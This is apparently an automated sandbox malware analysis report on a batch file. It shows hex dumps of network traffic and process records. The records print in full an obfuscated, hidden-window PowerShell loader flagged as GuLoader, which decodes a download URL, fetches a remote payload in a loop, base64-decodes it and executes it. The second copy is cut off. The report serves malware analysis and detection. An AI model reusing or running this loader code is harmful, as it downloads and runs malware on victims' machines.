                  2024-07-11 11:12:52 UTC7951INData Raw: 77 c2 ff 76 de 4b 12 6b be 28 36 24 0f c1 c3 88 4a bc 30 a3 ea 9e 83 b1 6e f4 1c 5c 72 32 6d b3 97 4f bb 2c ee 6e a6 53 85 64 69 93 04 7b 30 f3 78 08 07 6a d4 14 08 67 10 ef ba a9 ba 26 b5 03 a1 09 47 e9 69 e0 89 19 55 9d a6 da 76 61 5c a7 58 42 14 04 f0 a9 c0 a4 ac 1b eb b7 47 d0 9c 44 51 a0 e9 e0 0b a3 4e 56 8c 9f bf 16 5a ce bc e5 af 78 59 8f ac dc 95 ad e7 41 70 00 14 d8 7d 3d b3 66 98 4a d1 93 27 39 52 c0 6d 59 c9 67 5e bf 70 4c c0 d8 4c 53 4d 3a ec 0b 8d 0f ee ce e9 73 b3 c8 f9 ec 3a d7 ef db 96 b2 f6 90 e4 ef 22 28 a9 f5 86 8f 16 29 ae c5 3f 03 2e 6a e7 42 a7 ab f9 a3 e0 9e 9b 38 01 c5 82 4b 55 08 f5 5c c4 23 78 59 99 f6 ee 47 43 ea 6a eb 46 f5 85 19 ea e3 8a d8 1e 35 50 16 1a 01 0c f2 b8 eb 75 5b d5 a5 9d cc df 3b 60 27 21 7a 9d 98 99 00 87 9b a5
                  Data Ascii: wvKk(6$J0n\r2mO,nSdi{0xjg&GiUva\XBGDQNVZxYAp}=fJ'9RmYg^pLLSM:s:"()?.jB8KU\#xYGCjF5Pu[;`'!z
                  2024-07-11 11:12:52 UTC8000INData Raw: 78 09 e1 98 b5 27 6d 55 a8 68 08 46 3a 78 8f bc 84 75 e5 0e 11 69 30 f1 aa 91 4d 88 14 2e b7 7a 52 1c 46 27 1e 41 e7 45 a1 07 5b 87 20 9d 5e 3a ff 3f 83 dd c4 e4 b6 4f 45 0e 56 45 cf df 46 68 23 af 72 eb ae 7e e0 37 a2 d4 93 92 27 b8 7f 73 3b bc 87 76 10 bb 95 44 4f 34 55 32 77 bd 9d 10 f3 df 28 94 ec c2 64 ba 29 c1 22 0a 89 dd e5 d5 9b 5c 67 d4 da ad 00 13 c7 53 fb b8 8a 3c 00 ce d7 52 02 c4 55 bc 29 39 c0 cd 30 fd c5 3f a4 dc 9d f1 f7 1b 57 4a 16 05 7b 1f c4 ca ae 69 21 1e 0c 82 6c fe d2 86 e7 4a 4c 18 ab 0c fa 76 f5 25 5f 5f 12 b7 b2 9d 28 e5 6e 62 cd 87 45 39 69 f8 7c 2a 7a 81 c1 3b 31 fd d9 a3 e5 58 55 31 e9 07 ba 89 5b 9b f0 70 38 ab 6a e2 ec a2 3e aa ae a1 02 ea f2 1d e6 f2 a8 67 d5 39 bf 48 04 41 c8 1a f0 d1 bf 99 f4 d0 3e 6a 99 39 79 c4 fe c4 dd
                  Data Ascii: x'mUhF:xui0M.zRF'AE[ ^:?OEVEFh#r~7's;vDO4U2w(d)"\gS<RU)90?WJ{i!lJLv%__(nbE9i|*z;1XU1[p8j>g9HA>j9y
                  2024-07-11 11:12:52 UTC8000INData Raw: b5 00 a5 c1 37 3d 03 57 74 f1 43 22 b8 92 72 96 01 50 56 46 83 08 d1 f1 58 ec 1b 22 d3 74 fd 17 22 9a ee f9 b9 0f 09 f9 90 1f 82 c0 9e 82 e0 69 0d c5 25 91 a2 be b6 47 3a 28 4f aa a1 34 bb 9c e0 6e 30 ca 84 5c 06 e8 40 06 d9 c8 59 f9 ef bb 18 1f ce 18 28 d9 bd af 78 80 b0 10 36 99 61 74 a3 e5 aa e8 f0 c5 ae ee 36 d1 b4 66 67 f5 bd c5 35 c6 28 4c 54 31 68 18 3b bc c1 48 f6 49 75 4c 9e e2 1c d4 80 34 ad a2 f2 37 6e 0b 15 0e ee b9 ff ae 71 2f 17 f3 5b dc 64 74 29 67 8a fc 73 dd 41 53 bf be 64 74 91 a1 52 08 9b d4 a0 51 7b c1 32 96 76 1d a1 90 26 69 9d 9e 02 c8 43 f7 0b bd 2c 8d d5 ad 12 79 da 9f 79 4b ab d3 10 9d 37 d3 de bd 88 3a 34 c2 77 4b 19 8b ac 0b f6 1a 65 3f df dc 69 fe c0 94 4c 76 e7 4c a7 7e bf c4 ef 10 6e 32 de b5 a6 e2 17 ce 4a c1 1d 9a 0c d8 41
                  Data Ascii: 7=WtC"rPVFX"t"i%G:(O4n0\@Y(x6at6fg5(LT1h;HIuL47nq/[dt)gsASdtRQ{2v&iC,yyK7:4wKe?iLvL~n2JA
                  2024-07-11 11:12:52 UTC8000INData Raw: 26 cd e1 75 a4 ca c9 9a d1 1f 3e 06 97 67 bc ae 49 fb 6b c0 5b 99 88 0f c9 cf 1f 69 4d 50 37 70 41 b3 6b 70 23 9b 98 43 ab 4e ea 41 eb 72 99 7b e0 02 62 76 2c 16 c2 0a 12 f4 2a 2d 1c a8 1c e4 86 00 73 0a e0 08 0f b3 7e a5 51 4a 73 73 ba 5c 0c 8a 95 13 7e d5 e8 99 0f bc 1c 6f db 8a 8c cb 06 b5 2d 87 fb dc 70 93 6c d9 2b f8 4f bc 99 a0 92 28 0c e0 cf 51 8c e2 b8 99 f7 76 f9 2f 6b fa b1 18 7c 01 72 a7 68 b2 bb 5f e6 21 42 b6 82 d4 6f 83 c5 23 38 62 09 92 35 6e 2a f1 43 41 ab d3 84 b4 ca 60 08 a5 88 e0 df 74 44 7d 1c 73 f4 35 57 6e 71 6f 1d 0f 8c 9e dc 40 c7 5c d1 5d 50 f9 ac 8b ee 97 81 28 d0 4f 09 d4 e5 15 24 86 db 03 72 57 b9 cb 9d 0d 70 d7 31 6c b1 b3 b9 93 20 c6 3b e1 cb c4 3a 63 b2 5b 72 75 12 1c 14 0b 63 06 e7 bf 5c 4f 4b bf 6f f2 0c d2 0a e5 fc 20 51
                  Data Ascii: &u>gIk[iMP7pAkp#CNAr{bv,*-s~QJss\~o-pl+O(Qv/k|rh_!Bo#8b5n*CA`tD}s5Wnqo@\]P(O$rWp1l ;:c[ruc\OKo Q
                  2024-07-11 11:12:52 UTC8000INData Raw: 0b 8a 81 a4 4a 8f a5 41 db 04 ae 43 b9 eb f9 d9 2a 60 ed 0e 4a 51 0c bd ac 79 aa b6 40 1f f3 1a 8e 0e d0 84 84 d2 9a c5 5d 92 d3 eb b3 00 a2 c5 71 ae 8e 0f 16 5f c9 01 39 38 ed a2 72 c3 9d 67 a5 60 a8 f2 7d cd 51 82 f7 3d 8d 05 ac 96 de ce 67 81 95 59 88 68 ed db 5f 5d d8 06 aa 26 7c 76 5b 10 a0 35 5f 59 73 1f 50 6d f2 dc 72 ec 6d f1 74 51 8e cb 7b 76 04 f1 13 55 da 0b 6e 94 1b 18 84 92 90 36 82 d8 1a 7f 58 95 9a 07 1e 4a a2 39 02 bc 88 b8 99 34 27 ab 68 0d 3f a1 d5 9a e7 5d 4a 3c fb 7a cc 52 7b 6e 24 75 fe 20 24 6e 4c 92 2f ee 09 9e bc 5d c0 ec 3d 3e 02 f3 5a b6 98 fa b6 71 9e a7 14 fa 6f 63 84 03 bb 6a a6 f5 6b 4d 76 48 aa 58 fe 40 a9 96 74 b3 2f 0c d9 02 17 41 6b fa 53 46 fa 32 d4 81 9e d3 d0 74 9c 0e 47 67 f6 3b 63 ce b0 d2 bf da 0d e2 50 38 df 8f eb
                  Data Ascii: JAC*`JQy@]q_98rg`}Q=gYh_]&|v[5_YsPmrmtQ{vUn6XJ94'h?]J<zR{n$u $nL/]=>ZqocjkMvHX@t/AkSF2tGg;cP8
                  2024-07-11 11:12:52 UTC8000INData Raw: 8d 47 92 8a 9c be ee ac 53 82 c5 eb 79 a2 18 d3 91 cc 6f 03 04 d9 ed f1 19 ec 42 4d c3 0d 97 9a b3 25 3f 50 ef 9b 6d 05 82 68 1a 76 20 0f ac 46 8f 05 e1 35 e9 14 5b e1 ea ba 62 4e 2f b1 4b 8e 53 8a a2 c8 0c e6 7b b4 b0 fc ce ae 15 32 26 5d c7 ca 71 db 33 c6 1c b6 17 2a 82 0a 08 b5 6c 92 44 d4 08 0f 5e 2d a9 fe 37 26 98 a8 8b b0 73 84 df fe 59 53 7d a7 9a af 98 d8 2f f8 90 1e 75 2a 65 65 b1 a1 00 d6 e8 f4 88 85 06 9b 00 5b 07 09 b9 e1 a3 0b ad 98 df 19 40 bd e4 7a d4 c8 3b f2 4a 96 3d 79 d1 33 04 93 76 a7 33 f1 15 07 7a 6c 9c c4 4e 20 48 93 de 41 90 cc e8 0c 3b 32 ec de f7 80 a2 8b fd 32 03 b4 da bb a7 ec 01 5b 3d 89 1b 87 7d e4 9e 58 5c fb bf 66 6c c2 76 49 34 3e 1e e3 6b bc 9b 7a 5b ba 53 ef f4 ab e3 33 66 b5 97 1b 14 c2 ec b3 5e b3 87 5c 9c 40 26 0a f0
                  Data Ascii: GSyoBM%?Pmhv F5[bN/KS{2&]q3*lD^-7&sYS}/u*ee[@z;J=y3v3zlN HA;22[=}X\flvI4>kz[S3f^\@&
                  2024-07-11 11:12:52 UTC8000INData Raw: f6 49 32 4e 12 28 dc 3f d7 e3 a9 2b 3f ad a3 f6 7a 00 a7 76 cb 59 76 ed 8b 81 34 ef 23 91 22 09 06 3d 57 f0 1e 97 b2 86 f7 c6 31 06 1e 8b a1 11 64 81 59 9f 0a 5c 35 c6 d1 7f 85 e2 80 c2 be 69 19 4a 93 9b 8c 2a 04 d1 54 a9 b1 80 02 73 83 4b bb de b0 eb 7a 8c 2d 77 ef ec 32 a6 5a b1 44 79 33 51 55 0f 2d 62 d2 c8 1c 5d fc 83 ae a9 5b f0 26 49 8c 66 c6 9a 3d d5 05 01 35 b6 70 ef 33 a8 71 c9 ae 3a b7 1e 0d 65 55 6b 6c 7e 5c be 3e 76 7e 42 1b 9e 69 4c 20 fd b1 29 a0 1b 6e 18 e0 5f 99 84 2a 2b 9c 06 bf 0d 8f 1d 48 d4 c6 40 e0 73 13 d0 d5 f3 f8 81 5e ae 25 bb 43 e6 5d 12 14 f3 f6 db 37 25 6c e1 45 38 a6 e9 90 79 4d c8 8c 33 66 84 47 01 0b 2c c3 1b 78 35 01 a2 5e ab 3e 25 40 ad c8 40 c8 42 0c a0 f7 6c 07 0f 10 ff 03 5d 3d 06 1f 23 45 a5 bb ce 5b 2e 4b 59 ad 40 61
                  Data Ascii: I2N(?+?zvYv4#"=W1dY\5iJ*TsKz-w2ZDy3QU-b][&If=5p3q:eUkl~\>v~BiL )n_*+H@s^%C]7%lE8yM3fG,x5^>%@@Bl]=#E[.KY@a
                  2024-07-11 11:12:52 UTC8000INData Raw: a5 ee bf 58 81 47 60 ab 43 e3 78 98 e7 23 b8 96 e2 4c f5 5b 67 40 0e 9f 2f 67 c8 d6 47 ef 19 0d 58 26 81 c9 b1 a9 09 15 20 90 41 d9 22 f3 c0 04 3a de 50 23 92 fc 05 39 87 8e ab 8c d1 7a 65 c9 e8 12 89 93 01 d0 9b 7a cf 44 80 f7 97 1c 54 4f ca a1 51 59 a4 20 0a 6c 26 0c d5 97 c4 93 55 21 f7 b9 01 a0 7f 44 45 ee 58 a4 15 83 c0 b0 08 4f a3 5a 32 c0 6d bd db 00 75 88 8e 88 85 c2 3f 49 40 2f 77 cd cb 0c 01 71 e9 a5 73 58 cb 69 30 9b e2 3c 0c 21 a4 89 b3 78 db 94 57 7e 57 85 42 7e a6 37 9d c7 df 54 63 ca cd f0 96 81 b8 91 d0 de d6 eb 98 f0 76 22 e7 1a 21 71 16 67 19 e9 68 d1 e6 9d 63 fe 64 03 9e 93 ed ff 55 50 d2 2b d4 22 cf 9b a3 a7 29 e8 31 d1 7e b0 1a c1 5d d0 75 b6 b5 68 0a 2e 0d 05 2d 30 fb eb 5c 8b 0c e8 04 0c 05 9f a0 ef c9 e7 41 50 fb b6 73 a4 07 a2 2b
                  Data Ascii: XG`Cx#L[g@/gGX& A":P#9zezDTOQY l&U!DEXOZ2mu?I@/wqsXi0<!xW~WB~7Tcv"!qghcdUP+")1~]uh.-0\APs+
                  2024-07-11 11:12:52 UTC8000INData Raw: 08 13 2a 81 47 9b 0b 03 74 8d b5 8d 2c ad 30 36 f5 6e 62 ed d7 7a e8 6f f5 66 b8 7d f3 00 15 42 ba 02 8d ca 70 71 ec eb 94 af 4c 66 f7 83 e0 f5 19 22 1e ce 5d 0b ea 14 0f f5 09 af 52 4e 02 1b 88 3d 33 5f f0 58 72 71 91 44 d2 8d fd df ee 1d d7 51 eb ea 11 56 3a 55 16 dc 4d 8b 14 bf 69 78 7c 1b 6d d0 b8 36 37 56 f9 6f ec 20 60 62 d2 3b 9c 8e 81 5d 09 b0 c1 b7 3a 5f 76 26 ae 7f 4b 3d 5f e0 53 44 95 f7 e5 06 c3 df 72 40 d3 e1 c7 72 85 2e 97 da cd 29 72 20 9c 51 68 97 d3 42 0d 1b 32 de 16 57 a4 b2 a7 a5 af 40 0b 66 b5 a1 5d 6d fb 7c 54 66 fa 9f cf 96 36 26 86 1f 37 9e 81 77 f1 8e 50 a2 7c e8 ad f7 5e 0e 8c a2 39 e7 33 e4 e0 fb a0 de 1e b2 49 c3 c6 21 d7 ae 9e 2b ac bb ae 19 80 01 4a 52 51 5f aa c8 aa 1e 26 c5 02 25 44 1a c2 41 e3 20 0c a3 b3 d3 5a 09 ad 2f b6
                  Data Ascii: *Gt,06nbzof}BpqLf"]RN=3_XrqDQV:UMix|m67Vo `b;]:_v&K=_SDr@r.)r QhB2W@f]m|Tf6&7wP|^93I!+JRQ_&%DA Z/
                  2024-07-11 11:12:52 UTC8000INData Raw: 43 96 3f 4c eb c5 bb 06 09 8d 65 9c 15 ac 36 74 88 13 24 68 02 8c 4c ef 46 aa f3 b5 94 08 2b 02 7c 53 70 f5 3e f9 5e d4 c1 e9 c3 6b 18 63 cf b7 e1 1c 61 f1 37 25 d2 1f 8d 19 6b 42 08 5d bb 3f 6b 93 97 8f ac e5 96 f0 c5 a3 7f 3f a1 fe 63 dc 31 05 4a bb 7d 36 36 47 6c 3d 46 ab 6a 92 4c b1 a9 ad f9 a8 74 e6 9f 6a f9 e0 ea e9 85 d9 b5 c3 28 ed 16 04 4b 78 01 2c a8 37 92 c5 87 07 0b d4 23 90 f6 0b 9d ef cb bb 63 9b 07 fb d5 02 83 51 2e 7c c8 87 16 63 d8 44 0e da 23 65 a4 d1 00 50 08 f1 32 0f ba 5d 6a 09 25 64 15 2f c6 b2 da cf 61 71 dc 3a 6a ae 2c f0 2e f5 68 09 40 a2 b0 10 d9 d5 62 56 33 14 bc 5d 8d b1 d6 c5 73 be a7 e7 00 46 74 c3 a8 c5 80 79 0b 3d ed 2d ab 37 ee f3 96 66 19 a7 0a 34 5c 01 e3 ec 01 b8 de d8 d1 5d 19 49 1b c4 7d 0f 15 9d 45 aa 1c d1 d7 d6 86
                  Data Ascii: C?Le6t$hLF+|Sp>^kca7%kB]?k?c1J}66Gl=FjLtj(Kx,7#cQ.|cD#eP2]j%d/aq:j,.h@bV3]sFty=-7f4\]I}E


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:07:11:57
                  Start date:11/07/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" "
                  Imagebase:0x7ff7addf0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:1
                  Start time:07:11:57
                  Start date:11/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:07:11:57
                  Start date:11/07/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings '.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:07:11:57
                  Start date:11/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:07:11:59
                  Start date:11/07/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
                  Imagebase:0x7ff7addf0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:07:12:07
                  Start date:11/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust 